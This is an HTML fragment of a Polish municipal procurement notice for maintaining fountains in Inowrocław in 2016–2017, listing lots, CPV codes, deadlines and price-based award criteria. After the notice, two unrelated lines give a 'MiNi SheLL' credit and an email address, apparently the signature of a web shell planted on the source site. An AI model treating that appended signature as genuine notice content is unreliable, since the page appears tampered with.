<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie   polega   na   wiosennym   rozruchu   oraz   na   utrzymaniu  sprawności  technicznej i należytego  stanu  porządkowego  12  fontann  zlokalizowanych  na  terenie  Miasta  Inowrocławia, w okresie od 15 kwietnia 2016 r. do 15 października 2016 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Bieżąca obsługa i konserwacja fontanny na inowrocławskim Rynku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie polega na wiosennym rozruchu oraz na utrzymaniu sprawności technicznej i  należytego   stanu   porządkowego  fontanny  zlokalizowanej  na  inowrocławskim  Rynku w  okresie  nie   wcześniej   niż  od  15  kwietnia  2016  r.  do 14 kwietnia 2017 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.04.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 73</li>
<li>2. wskaźnik narzutu kosztów pośrednich - 20</li>
<li>3. wskaźnik narzutu zysku - 5</li>
<li>4. wskaźnik narzuru kosztów zakupu materiałów - 2</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com